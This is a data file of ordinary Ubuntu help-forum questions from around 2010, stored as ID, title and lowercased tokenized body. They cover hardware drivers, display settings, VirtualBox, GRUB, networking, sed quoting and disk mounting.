4217	what webcam can i buy that works out of the box with ubuntu ?	i need to set up a video conference , yet i have no webcam . i 'm looking to buy something that works out of the box with ubuntu 10.04 , and as many possible conferencing apps as possible . can anyone recommend me something i might be able to find at a local store ?
4220	banshee syncs to ipod but then there are no songs/playlists on the ipod	my current setup : ubuntu 10.04 banshee 1.6 ( i followed the instructions to set up the ppa and get the latest version ) ipod 5th gen video ( ma147ll ) with firmware 1.3 here is the issue : i restore the ipod on a windows machine i plug in the ipod on the ubuntu machine i set the sync preferences to be `` sync to `` and `` sync when connected and when libraries change '' banshee says it is syncing with the ipod when it says it 's done , i disconnect the ipod and there are no songs or playlist on the ipod when i plug the ipod back into the ubuntu box , banshee tells me the database on the ipod is too new or needs to be repaired . if log snippets or anything else would help in resolving this , please let me know . edit : so it does n't work with 1.7.5 either . here is the link to the bug i opened for this : https : //bugzilla.gnome.org/show_bug.cgi ? id=629838
4222	how do i enable visual effects when running ubuntu as a guest machine in virtualbox ?	i have ubuntu 10.04 64bit guest with windows 7 64-bit host . i do have 3d acceleration enabled in virtualbox settings . every time i enable visual effects in ubuntu the virtualbox gui crashes . what do i need to do to have visual effects enabled in ubuntu ? virtualbox 's logs do n't say anything useful at crash . my graphics card is an nvidia 8800 gts with the latest 258.96 drivers , but i 'm sure that 's not part of the issue .
4223	is there an equivalent to macrabbit 's cssedit on ubuntu ?	if there is an emacs pluggin that would give me similar functionality , that would be welcome as well . thanks !
4227	installing solaris studio 12.2 ?	i 'm having a dickens of a time installing solaris studio 12.2 on ubuntu 10.04 . i found this guide , however using the alien option is n't finding the correct files . i 'm not exactly sure on the syntax of alien , its kinda alien to me . ( sorry for the bad pun ) also , when i download the tar file , and extract it , there are errors everytime saying things like : '' operation not permitted '' can not creat symlink to '../prod/bin/cc ' : operation not permitted i 've extracted with super user access , but to no avail . any success from anyone else ?
4230	how to modify grub entry for supporting kgdb kernel image ?	i am trying to update target m/c grub.cfg file for kgdb setup but while booting the m/c it got hung completely and not asking/waiting for remote gdb connection . following is the entry which i added : - menuentry 'ubuntu , with linux 2.6.32-24-kgdb ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod ext2 set root= ' ( hd0,1 ) ' search -- no-floppy -- fs-uuid -- set 12878c3b-c553-4b4b-986a-6e32daea3ad1 linux /vmlinuz-2.6.32-kgdb root=/dev/mapper/ubuntu-root ro kgdbwait kgdboe= @ 192.168.140.23/ , @ 192.168.140.158/ quiet initrd /initrd.img-2.6.32-24-server } i have also compiled and copied /boot/vmlinuz-2.6.15.5-kgdb & /boot/system.map-2.6.15.5-kgdb to target m/c from devlopement m/c . std entry before adding kgdb in grub.cfg was : - menuentry 'ubuntu , with linux 2.6.32-24-server ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod ext2 set root= ' ( hd0,1 ) ' search -- no-floppy -- fs-uuid -- set 12878c3b-c553-4b4b-986a-6e32daea3ad1 linux /vmlinuz-2.6.32-24-server root=/dev/mapper/ubuntu-root ro quiet initrd /initrd.img-2.6.32-24-server } please suggest how to get rid of this problem .
4232	upgrading kernel and drivers in a backtrack iso	i 'm using the latest backtrack iso release for security analysis . backtrack is basically a configured ubuntu distro . however , i 'm missing my wireless card driver ( broadcom 4313 ) . there are several forum posts on the site explaining how to upgrade the kernel and install the drivers . however , i use the iso file from a usb drive as a `` live cd '' ( i.e. , no installation ) and can therefore not tchange the original iso . my question is : how can i take an iso file ( any , for this matter ) , update its contents and repackage it to a new iso that can be live-mounted ? is there a procedure for this ? do i need to use a virtual machine ?
4240	how to have pidgin chat windows open up on all workspaces ?	i use pidgin as my chat client on ubuntu lucid . whenever i have a chat window open , i like to mark it as `` always on visible workspace '' as it 's just more convenient . is there a way that i can force chat windows to already be marked as that when they open up ? so , if someone started a conversation with me on gtalk ( for instance ) the window would automatically be on all workspaces , and i would n't have to mark it manually .
4244	move raid1 to new machine	i have an older server with / on one hard drive and /srv on a raid1 partition , which i remember took some time to set up ( i set it up after the installation ) . i will be installing ubuntu 10.04 onto a new server , but would like to take the /srv hard drives to the new machine . what steps need to be taken to ensure a complete and proper migration ? should i tell the installer about the additional drives , or connect them after setup has completed ? for reference , i will be installing the `` standard '' ubuntu desktop , and adding server applications , rather than installing a `` server '' ubuntu and adding desktop applications .
4246	what are some good php editors ?	i 'm currently using phpstorm by idea jetbrains , but its buggy and i 'm really looking for something that will allow me to get work done without too much hassle . please limit one ide/editor an answer .
4253	getting screen resolution correct with nvidia drivers	i have a new install of ubuntu . upon first installing the nvidia drivers are not active and i get the correct screen resolution . 1680x1050 then i install the nvidia drivers and the best resolution i can get is 1280x1024 . in searching around there is a lot of information related to this and similar issues . i have tried tips with xrandr , manually installing the drivers , etc , etc . finding the right information is proving troublesome however . i know that the graphics card can out put the correct resolution because it does until the nvidia drivers are activated . so does anyone here know the solution ? ( why does this have to be so hard ? ) this is not a new whiz bang system , but one i put together with spare parts . graphics : nv37gl quadro pci-e series monitor : viewsonic vx2025wm -- this monitor worked correctly on my other ubuntu system with the nvidia drivers , but was connected with vga instead of digital . -- -- -- -- -- -- -- xorg.conf -- -- -- -- -- -- after -- - 1 . install the restricted drivers system -- - > hardware drivers -- -- -- -2 . select the recommended drivers , install and reboot . -- -- -- ( # nvidia-xconfig : x configuration file generated by nvidia-xconfig ( # nvidia-xconfig : version 1.0 ( buildmeister @ builder75 ) sun nov 8 21:50:38 pst 2009 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 30.0 - 110.0 vertrefresh 50.0 - 150.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection so , any suggestions on this ? at this point i 'm assuming that the issue has to do with a good xorg.conf file and possibly edid . a clear set of docs on this issue is hard to find . in searching the forums and other web sites i 've found lots of others with similar issues , but it 's all so scattered that it 's hard to tell which ones are not dead ends . given that many posts are dated as far back as 2006 and earlier , and that nvidia cards are so ubiquitous , it 's hard to understand why there is n't an easier solution .
4263	getting wireless on a macbookpro4,1	i just put ubuntu on my macbookpro4,1 , but i ca n't find or connect to any wireless networks . i 've tried installing drivers from system - > administration - > hardware drivers , as well as manually patching ( per this site ) . all my hardware is standard , what came with the machine .
4265	is there any support whatsoever for the art tube mp project series w/usb ?	here 's the product 's page off the mfg 's website so you know exactly what i 'm talking about . any help is appreciated . http : //artproaudio.com/products.asp ? id=124 & cat=9 & type=86
4266	unable to connect to wireless network	i am running 10.04 with the latest updates on an msi 1719 ( gx700 ) laptop and am unable to get it to connect to my wireless network . it sees the available networks and allows me to go through the setup process but always fails to connect after i input the pass key . as per a response i found here , i am posting the following information : output from lsmod : module size used by cryptd 8116 0 aes_x86_64 7912 54 aes_generic 27607 1 aes_x86_64 binfmt_misc 7960 1 ppdev 6375 0 dm_crypt 13043 0 rfcomm 40393 0 sco 9617 0 snd_hda_codec_realtek 279040 1 snd_hda_intel 25677 2 bridge 53184 0 stp 2171 1 bridge bnep 11884 0 snd_hda_codec 85759 2 snd_hda_codec_realtek , snd_hda_intel snd_hwdep 6924 1 snd_hda_codec snd_pcm_oss 41394 0 snd_mixer_oss 16299 1 snd_pcm_oss snd_pcm 87882 3 snd_hda_intel , snd_hda_codec , snd_pcm_oss l2cap 34806 4 rfcomm , bnep snd_seq_dummy 1782 0 snd_seq_oss 31219 0 snd_seq_midi 5829 0 snd_rawmidi 23420 1 snd_seq_midi snd_seq_midi_event 7267 2 snd_seq_oss , snd_seq_midi snd_seq 57481 6 snd_seq_dummy , snd_seq_oss , snd_seq_midi , snd_seq_midi_event snd_timer 23649 2 snd_pcm , snd_seq snd_seq_device 6888 5 snd_seq_dummy , snd_seq_oss , snd_seq_midi , snd_rawmidi , snd_seq sdhci_pci 6700 0 btusb 12969 0 lp 9336 0 snd 71106 16 snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm_oss , snd_mixer_oss , snd_pcm , snd_seq_oss , snd_rawmidi , snd_seq , snd_timer , snd_seq_device soundcore 8052 1 snd sdhci 17928 1 sdhci_pci joydev 11072 0 parport 37160 2 ppdev , lp bluetooth 58685 5 rfcomm , sco , bnep , l2cap , btusb led_class 3764 1 sdhci snd_page_alloc 8500 2 snd_hda_intel , snd_pcm rt2860sta 542482 1 nvidia 10832442 44 psmouse 64576 0 serio_raw 4918 0 ohci1394 30260 0 fbcon 39270 71 tileblit 2487 1 fbcon font 8053 1 fbcon bitblit 5811 1 fbcon video 20623 0 output 2503 1 video softcursor 1565 1 bitblit ieee1394 94771 1 ohci1394 r8169 39650 0 mii 5237 1 r8169 vga16fb 12757 1 vgastate 9857 1 vga16fb intel_agp 29095 0 output from ifconfig : eth0 link encap : ethernet hwaddr 00:19 : db : ee : ec : b3 up broadcast multicast mtu:1500 metric:1 rx packets:12138 errors:0 dropped:0 overruns:0 frame:0 tx packets:9408 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:13983048 ( 13.9 mb ) tx bytes:1515167 ( 1.5 mb ) interrupt:30 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:717 errors:0 dropped:0 overruns:0 frame:0 tx packets:717 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:59328 ( 59.3 kb ) tx bytes:59328 ( 59.3 kb ) wlan0 link encap : ethernet hwaddr 00:1d:7d:3e:34:86 inet6 addr : fe80 : :21d:7dff : fe3e:3486/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:618331 errors:0 dropped:0 overruns:0 frame:0 tx packets:30391 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:60888090 ( 60.8 mb ) tx bytes:507 ( 507.0 b ) interrupt:19 the output from the `` route '' command and the `` cat /etc/resolve.conf '' were both blank . update as per the suggestions in the two answers provided thus far , i am adding the following information : output from lshw -c network *-network description : wireless interface product : rt2860 wireless 802.11n pcie vendor : ralink physical id : 0 bus info : pci @ 0000:06:00.0 logical name : wlan0 version : 00 serial : 00:1d:7d:3e:34:86 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rt2860 latency=0 multicast=yes wireless=rt2860 wireless resources : irq:19 memory : f9ef0000-f9efffff *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:07:00.0 logical name : eth0 version : 01 serial : 00:19 : db : ee : ec : b3 size : 10mb/s capacity : 1gb/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half latency=0 link=no multicast=yes port=mii speed=10mb/s resources : irq:30 ioport : d800 ( size=256 ) memory : f9fff000-f9ffffff memory : c0a00000-c0a1ffff ( prefetchable ) output from cat /etc/network/interfaces auto lo iface lo inet loopback output from iwconfig : wlan0 rt2860 wireless essid : '' '' nickname : '' rt2860sta '' mode : auto frequency=2.437 ghz bit rate=1 mb/s rts thr : off fragment thr : off link quality=100/100 signal level : -84 dbm noise level : -87 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 output from lspci | grep network 06:00.0 network controller : ralink rt2860 wireless 802.11n pcie i have verified that the package `` wpasupplicant '' is installed . and i initially thought that it must be a problem with my router so i did a hard reset on it and set it up from scratch with basically just the defaults so i seriously doubt that 's the problem .
4279	how to install inkscape 0.48 release on older releases ?	what 's the right way to install inkscape 0.48 on a ubuntu karmic/lucid/maverick installation ? there are only older versions available in the ubuntu repositories . karmic : 0.47~pre4-0ubuntu1 lucid : 0.47.0-2ubuntu2 maverick : 0.47.0-2ubuntu3 i know there is a ppa with the latest version , but this ppa only covers the nightly builds and not the latest stable 0.48 version of inkscape . yesterday i tried to compile it on a ubuntu 9.10 box , but there are too many dependencies so i gave up . are there plans to integrate the latest 0.48 release in the maverick packages ?
4283	how do i backup/restore my empathy logs ?	i found a folder called ~/.local/share/tplogger/logs . if i just copy that folder , and paste it into a new installation , will my logs be preserved ? or will they not be associated with the new accounts ? i do n't want to risk it until i know for sure .
4288	installing mercurial : start with ubuntu desktop or server ?	i need to set up a mercurial server for experimentation . the setup will be in a virtual machine , and i figured this was a good time to check out ubuntu ( the other option was windows ) . the mercurial server will be light use ; as it is purely for lab / demonstration purposes ; however , i need to set up a full multi-repository server , which requires a web server ( apache seems to be the obvious choice ) . so , the question is : should i start with ubuntu desktop or server ? thanks !
4293	how to setup shotwell for multi-user access ?	typical use case : a family notebook with multiple user accounts . how do i setup shotwell so all users have access to the same photo directory and each is able to import photos ?
4295	debugging python memory leaks	i 'm trying to debug a memory leak in telepathy-butterfly . i tried to use valgrind , but empathy does not connect to msn when telepathy-butterfly is run this way . so , i figured out the only option left is to debug the memory leak by printing object sizes from within the code . i was able to get all objects ( using the gc module ) and print their sizes and types . the leak seems to come from a dictionary ( or dictionaries ) , which have no __name__ property , so i ca n't tell where their coming from . i tried to check all objects in globals ( ) , but it looks like they are not related to the dictionaries that leak . since this is my first time hunting memory leaks in unfamiliar python code , i thought it is best to ask for advice . any ideas ? thanks !
4297	options on initial install screen ( server )	something thats been bugging me for a while now ... when booting from the server or alternative install cd , there are some choices tied to function keys ( f4 , f6 , etc . ) along the bottom of the screen . some are relatively obvious , others ... not so much so , or least it 'd sure be nice to be able to read a description of what the intended usage is before committing to an install process only to find that i should have left well enough alone ; ) i ca n't seem to find a description of these options in the official documentation ... anyone know where it might be squirreled away , or who i could get ahold of to find out ? tia , monte
4301	files disappear on 10.04	for the second time i experienced a strange behaviour on my ubuntu 10.04 box : some files are disappearing . the first time happened with a ntfs partition on an external usb disk : `` disk utility '' told me that it had bad sectors in it and thus it was unreadable but , after a reformat of the disk , it was recognized succesfully . the last time it happened with a ext4 partition : my home folder was almost completely wiped out ; fortunately enough i use to store backups of my files , so i restored them but i ca n't figure out why i 'm encountering those kind of situations . so i assume that the problem is not really a matter of bad sectors ( two different hard disks , that after the restore are working fine ) . what am i supposed to do in order to debug/resolve the issue ? note : the os is a former ubuntu studio 9.10 , upgraded to 10.04 .
4304	how do i put web applications in my unity launcher ?	early screenshots of unity showed web applications on the launcher that would get launched in the browser . i heavily use chrome 's `` appmode '' , which makes .desktop files of web applications and runs them as a seperate application . i would like to put these applications on my launcher so that when i click on it it launches gmail in a separate window , like a separate application from my browser . am i missing something ? launching the application from the .desktop file from the file manager just opens it my existing browser .
4305	what is the current status of the performance of nvidia vs ati video cards ?	which is probably better for a new machine running ubuntu ?
4306	how do i load ecb at emacs start up ?	i am having trouble loading ecb at emacs startup . d @ d : $ apt-file search ecb.el ecb : /etc/emacs/site-start.d/55ecb.el ecb : /usr/share/emacs/site-lisp/ecb/ecb.el emacspeak : /usr/share/emacs/site-lisp/emacspeak/lisp/emacspeak-ecb.el xemacs21-basesupport : /usr/share/xemacs21/xemacs-packages/lisp/ecb/ecb.elc xemacs21-basesupport-el : /usr/share/xemacs21/xemacs-packages/lisp/ecb/ecb.el.gz my .emacs file : ( add-to-list 'load-path `` /usr/share/emacs/site-lisp/ecb/ '' ) ( require 'ecb ) what am i doing incorrectly ?
4309	which font formats can i use ?	i 've learned that i can put .ttf font files in ~/.fonts to use them on ubuntu . which other font formats can i use this way ? i 'm having trouble finding the right documentation .
4311	install a i386 printer driver into an amd64 distribution or how can i find a good printer based on features ?	i just bought a lexmark interpret s408 all-in-one printer . the box said that it supported ubuntu 8.04 , but i told myself it should work with lucid ... well no . the only driver i have found is for i386 while i have a amd64 image installed ; the architecture is incompatible . so , the quesiton is : is it possible to install that driver anyway , somehow ? or do i need to take that printer back to the store and buy another one ? if the latter is the only alternative , i need a printer that has wireless connection capability can do color printing is of good price ( less than $ 200 cad ) thank you for your answers , help , and tips . ** update ** the driver was given in the form of deb package ( for debian distributions ) and i managed to extract the actual deb package driver out of the install program . i ran sudo dpkg -i -- force-all lexmark-inkjet-09-driver-1.5-1.i386.deb and the driver installed , and i was able to print something out . but that pretty much ends there ; i can not access anymore of the printer settings , etc . ( i.g . scanner , fax , wifi settings , etc . ) i should suffice for now as i 'm satisfied with the printer 's features ( and size , and prince ) , but if i could have a full-linux-supported printer like that one , i would return this one in exchange for the other .
4313	moving from fedora 12 to ubuntu 10.04	i recently moved from using fedora to ubuntu . the reason i was using fedora in the first place was that i was using redhat at work . now i am trying out ubuntu and will finally settle for one ( update to fedora13 or use ubuntu ) in a couple of days . what should i expect different here ? what is awesome and what is missing ?
4314	on screen keyboard malfunctioning on login screen	the problem is the login screen is divided into two showing a onscreen keyboard like thing in the left side and the same magnified in the other side . also it is giving the error message as /usr/lib/libgconf2-4/gconf-sanity-check-2 exited with status 256
4315	why ca n't you have multiple instances of synaptic ?	i would just like to know the reason .
4319	can not list home folder	all of a sudden i ca n't access my home folder . i am using ubuntu 10.04 . i can access the folders inside it ( desktop , videos etc ) but if i want to see inside the home itself ( either in nautilus or with ls in terminal ) i get nothing ( in nautilus it says loading in terminal and outputs nothing ) . i can access the folder as root . i did a chown on the whole folder .. still nothing . i get a warning that it ca n't change the owner for a folder ( .gvfs ) . it seems i ca n't even delete as root .
4320	how to make a keyboard layout permanent	i 'm currently working on a ubuntu machine that has been set up by a user using a german keyboard layout . i prefer another one and changed it using the `` keyboard '' dialog ( i even deleted the old one ) . however after each reboot those changes are gone . the german layout has reappeared and is ( again ) the default one . how can i make those changes permanent ?
4323	how can i find duplicate songs ?	the title says it all . how can i detect duplicates in my media library ?
4324	how can i change the order of the users in the login screen ?	i have several user accounts on a machine my mother uses most of the time . how can i sort the users so that her account shows up first in the list ?
4329	stop using flash ? or improve the flash experience ?	i 'd like to setup my ubuntu to work without flash ( = not installed ) , but still be able to view videos on sites like youtube , wisevid , etc . i want to try this because recently flash has crashed a couple times . it also often 'feels ' sluggish . also a couple other flash related questions here got me thinking there might be a better way of doing things . so how should i do this ? note : answers that have flash + work-arounds are also welcome .
4335	create a special version for rebuilt package	i 've recently recompiled suphp from the apt-get source to include several commandline options . after building the pacakge it remains at version 0.7.1-1 and aptitude keeps trying to install over the custom one i 've built . how can i update the version to reflect something like 0.7.1-1-marco0 - or something similar to that ( like how ubuntu will occasionally place ubuntu0 or ubuntu1 to a version to indicated an edit to the upstream 's source )
4336	how do i get my machine to boot with a grub : out of disk error ?	i have over the last week installed four differing versions of ubuntu , 8.04 , 8.10 , 9.10 and 10.04 , all fail with similar error messages from grub on booting or rebooting . the message is âerror : out of diskâ or similar on the older versions . this is not the standard failure that is solved by deleting a couple of lines from the grub config file , as discussed on the ubuntu forums and it is not possible to reboot into the installation from the live cd . however the machine does boot the live cd . my suspicions are that there is an incompatibility between the specific bios on my machine and grub . the machine is an old amd based system with a small amount of memory . the machine is capable of running ubuntu 8 because it was running a very heavily updated copy before this process started .
4339	intel gma x3100 : laptop with extra monitor . how can i display a different workspace in the external monitor ?	1 ) i found an incredible offer for a 22 ' fullhd monitor and bought it . i have connected it to my laptop as a second screen . doing system > preferences > monitors ... i can activate both screens and it correctly detects the new monitor 's resolution but it only allows me to position the new screen as a continuation of my laptop 's screen , and having so different resolutions each other it is quite annoying . one screen is much bigger than the other in terms of available pixels . could i make it work so i can have the external monitor only displaying a second workspace . 2 ) i have also seen that when watching a video in youtube , if i maximize the video that i was watching in the external monitor , the expanded video is seen only in the laptop 's screen . funny .
4340	what are some offline blog editors for ubuntu ?	any ideas for offline blog editors for ubuntu ?
4347	is there a cil ( mono ) library for using the messaging menu ?	i know that libappindicator0.1-cil-dev is used for application indicators , but it does n't seem capable of using the messaging menu . am i missing something , or is there a different library i should be using ? i do n't know of any mono applications that use the messaging menu . is there not yet a cil library capable of using the it ? i 'm running the ubuntu 10.10 beta .
4351	problem with installation of ubuntu	i am new at linux operating systems . i have installed the latest version of ubuntu 10.10 desktop edition on my laptop while still in windows . i then rebooted and chose ubuntu . it starts to load and it loads a little while and the screen goes blank . like it stops loading in the system and nothing happens . i do not need it for games or such . just to listen to music and for presentations and such things . could it do something with my laptop ? its a gericom laptop intel celeron processor 1300 mhz 480mb of ram .
4356	using gvfs or other automounter on ubuntu server ?	i have a headless machine running ubuntu server sitting in my closet . i would like to have usb disks automounted when i plug them in just like on my laptop . is it possible to set up gvfs or some other automounting system for use in a console and ssh environment , with no x11 installed ?
4358	how do i fix overscan on my hdmi hdtv ?	i 've connected a hdtv with hdmi on my radeon 4670 , using the open source ati driver . however there is `` overscan '' which cuts off a bit of each edge of the screen , about the size of the gnome-panel . how can i fix this so it displays the full resolution ?
4360	no network manager icon in the notification area , so i ca n't use my vpn connection	i 've added a vpn using system > preferences > network connections . however , i ca n't see how to switch it on , because there 's no network manager icon in the notification area ! nm-applet is running as me ; stopping and restarting it does n't help , nor does logging in and out . it 's possible that nm-applet thinks it does n't need to display an icon because i have wired networking - if so , how do i change its mind ? i 'm running ubuntu 10.04 `` lucid '' i386 . thanks !
4361	how are file-extensions/mime-types/icons/default applications asssociated ?	is there a way / application to add a file extension / mime-type to the system . what i want to achieve is : have a default program for opening files of this type have a special icon for this filetype let file output the type of a file of this file in a more specific way . is there an way to achieve this ?
4362	ubuntu one says i 'm out of space	ubuntu one does not sync my files . it always keeps saying that i 'm out of space . well , i have no files , 1 contact and 8 notes on the server . nothing else .
4364	how do i make a usb rs232 dongle show up in /dev/ttyusb* ?	i have a couple of ftdi based usb to rs232 serial dongles . sometimes when i plug them into my ubuntu 10.04 laptop , they show up as /dev/ttyusb0 and /dev/ttyusb1 , which is what i want to have happen . but sometimes they do n't . when they do n't , sometimes rebooting fixes the problem and sometimes it does n't . they always show up in lsusb hanging off of bus 5 : bus 005 device 003 : id 0403:6001 future technology devices international , ltd ft232 usb-serial ( uart ) ic bus 005 device 002 : id 0403:6001 future technology devices international , ltd ft232 usb-serial ( uart ) ic bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub i can see them if i do ls /dev/bus/usb/005 as 002 and 003 . but if i pass /dev/bus/usb/005/002 to pyserial , which is what i 'm using to access /dev/ttyusbx , i get serialexception ( `` could not open port : [ errno 13 ] permission denied : '/dev/bus/usb/005/002 ' '' , ) .
4368	external hard drive wo n't mount	since plugging the hard drive in did n't automatically make a window pop up i decided to manually mount the hard drive in disk utility . it gives me this : error mounting : mount exited with exit code 1 : helper failed with : mount : according to mtab , /dev/sdb1 is already mounted on / mount failed could this have been caused by leaving the hard drive plugged in when shutting down ? /etc/mtab : /dev/sdb1 / ext4 rw , errors=remount-ro , commit=0 0 0 proc /proc proc rw , noexec , nosuid , nodev 0 0 none /sys sysfs rw , noexec , nosuid , nodev 0 0 fusectl /sys/fs/fuse/connections fusectl rw 0 0 none /sys/kernel/debug debugfs rw 0 0 none /sys/kernel/security securityfs rw 0 0 none /dev devtmpfs rw , mode=0755 0 0 none /dev/pts devpts rw , noexec , nosuid , gid=5 , mode=0620 0 0 none /dev/shm tmpfs rw , nosuid , nodev 0 0 none /var/run tmpfs rw , nosuid , mode=0755 0 0 none /var/lock tmpfs rw , noexec , nosuid , nodev 0 0 none /lib/init/rw tmpfs rw , nosuid , mode=0755 0 0 binfmt_misc /proc/sys/fs/binfmt_misc binfmt_misc rw , noexec , nosuid , nodev 0 0 gvfs-fuse-daemon /home/matthew/.gvfs fuse.gvfs-fuse-daemon rw , nosuid , nodev , user=matthew 0 0 /etc/fstab : # /etc/fstab : static file system information . # # use 'blkid -o value -s uuid ' to print the universally unique identifier # for a device ; this may be used with uuid= as a more robust way to name # devices that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 /dev/sda1 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=3b0db205-2bdb-4c98-a506-6bdd3520d540 none swap sw 0 0
4371	change default width of gnome-terminal and terminator windows	only a short question but is it possible to set the default width ( and height ) of terminal sessions in gnome-terminal and terminator ? i find i always resize the window once it pops up so and given how much i use terminator it makes sense ( imo ) to alter the default and save myself some time later on .
4374	low volume/dual boot	i have an intel imac dual-booting ubuntu 10.04 and osx 10.6 . both work fine , but sound is very quiet in linux , even though the gnome volume control panel and pulse audio volume control panels are both set to 100 % . i can turn the speaker volume up and it 's fine , but then when i boot back to osx the volume makes me jump out of my skin . is there a setting i 'm missing ? if i turn the gnome sound pref volume higher then 100 , it tends to distort the sound . ( crackling )
4375	virtualbox does not show full screen	i have ubuntu 10.04 os and a virtualbox ( not the ose ) with windows xp as a guest . when i choose full screen in virtualbox the operating system ( my guest , windows xp ) is still in small screen . i installed the guest additions . however , if i go to devices on the menu , it still shows `` install guest additions '' like they were not installed . i can only choose 800x600 and 600x480 resolutions . i 'm using vb 3.2.8 . these are my settings : general name : windowsxp os type : windows xp system base memory : 512 mb processor ( s ) : 1 boot order : cd/dvd-rom , hard disk display video memory : 24 mb 3d acceleration : enabled 2d video acceleration : enabled remote display server : disabled storage ide controller ide primary master : windowsxp.vdi ( normal , 10.00 gb ) ide secondary master ( cd/dvd ) : vboxguestadditions.iso ( 32.01 mb ) floppy controller floppy device 0 : empty audio host driver : pulseaudio controller : ich ac97 network adapter 1 : pcnet-fast iii ( nat ) serial ports port 1 : com1 , disconnected it looks like windows xp is using the vitrualbox graphics driver ( device manager > display adapters : virtualbox graphics driver ) it just does n't show in full screen mode..
4377	dhcpd server issue multiple ip 's to one nic	i have a local dhcp server running on 10.04 want have a few host entries so that the machines can just use dhcp but allows me to route traffic to them via iptables . one of them is a windows 2008 server and it allows me to assign multiple ip 's to one card if i use static ip 's . is there a way to do this if it is using dhcp ? looking at http : //linux.die.net/man/5/dhcpd.conf i do n't think it is , at least the attempt i had did n't work . as i understand it the following would just choose the best ip and assign it that one , rather than all of them : host mymachine { hardware ethernet 00:00:00:00:00:00 ; fixed address 192.168.10.96 , 192.168.10.97 ; } edit everything i have read would suggest this is not possible . hope someone can prove me wrong , or show an alternative way of dealing with this so that all ip 's are dealt with at a central location and machines can have more than one ip ( dev and web servers ) .
4379	how do i block people with empathy	i 'm trying to block a user from contacting me , but ca n't seem to do this from the empathy interface . how do i block contacts ?
4391	how do we use mounted dvds with multiple accounts without ejecting the disk ?	i 'm sharing my pc with my wife and my sister on regular basis . there are several issues when we switch from one user to another , such as the networkmanager icon being present only on the first account ( which is ridiculous ) . a similar problem occurs when there is a dvd in the drive . when a second user logs in , the dvd can not be seen ( unmounted , ejected ) until you physically eject the disk ( i.e . press the button on the drive itself ) and reinsert it . my amateurish guess tells me that automount mounts the disk with the current user 's permissions [ citation needed ] so the other ca n't unmount it . this is a bit absurd since every user has the `` mount user-space filesystems ( fuse ) '' and `` use cd-rom drives '' permissions ( i am the only sudoer , though ) . is there any way this could be `` fixed '' ? it 's only a nuisance , but i can already see my co-users asking questions and being annoyed.. : )
4392	adding quotes to a string in a file	i currently have an sql file filled with insert statements in the form : insert into database.table ( primary_key , foreign_key , url_one , url_two , int_one , int_two , int_three ) values ( 266,7 , https : //some.url.com/image_one.png , https : //some.url.com/image_two.png,266,1440,900 ) ; i 've now realised that the url strings will need quotation marks around them before i can execute them in mysql . what command can i use to place quotation marks around the url string ? i tried to use 'sed ' to do it but i could n't get the command right as i do n't completely know the syntax of what i want to achieve : sed -e `` s/ ( https : // ) . * ( \.png ) /\ '' ( https : // ) $ 1 ( .png ) \ '' /g '' some_sql_file.sql running this results in : sed : -e expression # 1 , char 12 : unknown option to `s' any help would be much appreciated as i want to avoid regenerating the sql file just to put in the quotation marks if at all possible .
4395	should a new screenshot tool automatically set itself to work on pressing the prtsc key ?	having just written my perfect screenshot tool , i 've been trying to work out how it should set itself up for use by people who are not me . screenshots are traditionally taken by pressing the prtsc key . so , i could do the following things : as soon as the app is installed , make pressing prtsc invoke the app pros : works immediately , out of the box , as expected . a user installs the app , hits prtsc , they get the app they 've just installed . hooray . cons : unconditionally overrides any existing setup you have for prtsc , which might be annoying if you uninstall the app , it wo n't reset prtsc to what it was before , which is also annoying problematic for multiple users , because app installation runs under sudo , so how does it know which user 's prtsc setup to override ? it 's certainly possible to add a gconf key as part of installation , but that may be problematic if two different screenshot apps both try ? on first-run of the app , seize the prtsc key pros : avoids the above problem of wrongly seizing other users ' prtsc keys cons : you have to run the app once manually first , which is annoying ( and how do you know how to do that ? ) will still not restore the old setting if the app is uninstalled have a configuration dialog in the app where you configure it to seize prtsc pros : only seizes prtsc for people that really want it to cons : you have to run the app once manually first , which is annoying ( and how do you know how to do that ? ) you have to go into a configuration dialog to make the app actually do what it 's intended to do ; take screenshots when you press prtsc . ubuntu is past that configure-everything stage now , surely ? how irritating . not doing this ! something else i have n't thought of a better cleverer approach that just has n't dawned on me yet . suggestions welcomed !
4396	how do i mount a qcow2 disk image ?	i have a qemu virtual machine that uses a qcow2 disk image . how can i mount its filesystem without powering on the virtual machine ?
